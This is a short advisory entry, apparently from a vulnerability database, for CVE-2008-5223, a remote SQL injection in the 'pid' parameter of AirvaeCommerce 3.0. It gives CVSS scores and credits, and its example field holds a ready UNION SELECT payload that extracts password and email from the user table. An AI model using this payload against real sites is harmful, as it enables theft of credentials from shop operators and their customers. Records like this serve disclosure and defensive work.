Critical Vulnerability Information Vulnerability Name: AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability CVE ID: CVE-2008-5223 CVE Type: CWE-89 Risk Level: High Vulnerability Date: - Publication Date: 2008-11-26 - Update Date: 2008-11-27 Local Vulnerability?: No Remote Vulnerability?: Yes CVSS Score CVSS Base Score: 7.5/10 - Exploit Scope: Remote - Confidentiality Impact: Partial Impact Subscore: 6.4/10 - Attack Complexity: Low - Integrity Impact: Partial Exploitability Subscore: 10/10 - Authentication: No required - Availability Impact: Partial Vulnerability Details Vulnerable File: http://localhost/ path script / ?p=vzh&pid= [SQL] Example: /?p=vzh&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,concat(pwd,0x3a,email),47%20from%20usr%20where%20id=2/ Note: Some sites use SELECT statements with different numbers of columns, approximately 45. References XForce ISS Milw0rm Secunia Additional Information Author: QTRinux [Qataro (at) hotmail (dot) Com] Application: AirvaeCommerce 3.0 Download: http://www.airvaeecommerce.com Price: $179 Module: By AirvaeCommerce 3.0 Acknowledgements: Allah, InjecTor, AlQaTaRi, all InjEctOrS TeaM, TrYaG TeaM & Muslims Hackers Usage Terms**: This vulnerability is for educational purposes only. Unauthorized use is prohibited.